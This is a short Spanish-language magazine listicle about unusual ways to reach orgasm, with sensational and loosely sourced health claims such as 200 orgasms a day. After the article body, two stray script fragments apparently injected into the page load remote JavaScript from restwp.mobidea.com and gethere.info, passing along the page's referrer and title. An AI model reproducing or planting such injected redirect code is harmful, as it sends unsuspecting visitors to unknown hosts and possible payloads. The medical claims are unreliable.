Formas diferentes de conseguir orgasmos

Por Elizabeth Palacios     @ely__palacios

La forma más excitante de llegar al orgasmo, sin duda, es a través del sexo, sin embargo, existen diferentes maneras de conseguir orgasmos y, seguramente, no las conocías.

En WTF te decimos algunas:

-Ejercicio

Existen ciertos ejercicios que involucran a los músculos del tronco que pueden provocar orgasmos, principalmente a las mujeres.

-Pezones

Una buena estimulación de los pezones puede hacer que una mujer llegue al orgasmo sin necesidad de llegar a la penetración, esto debido a que se libera oxitocina que produce contracciones en la vagina y con ello, orgasmos.

-Montar a caballo

Algunas mujeres consiguen orgasmos después de un rato de montar a caballo.

-Bostezo

Algunas mujeres, como efecto secundario del consumo de clomipramina, un conocido antidepresivo, pueden experimentar bostezos que las llevan al orgasmo.

-Atascón

Existe el reporte del caso de una mujer que es capaz de llegar al orgasmo luego de darse un atascón de comida chatarra, el problema es que la mujer pesa más de 200 kilos.

-Síndrome de excitación sexual permanente (PSAS)

Es un estado clínico en el que el flujo sanguíneo se encuentra en permanente aumento provocando orgasmos a las mujeres, de hecho, algunas pueden llegar a tener hasta 200 orgasmos al día.

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||
Comentarios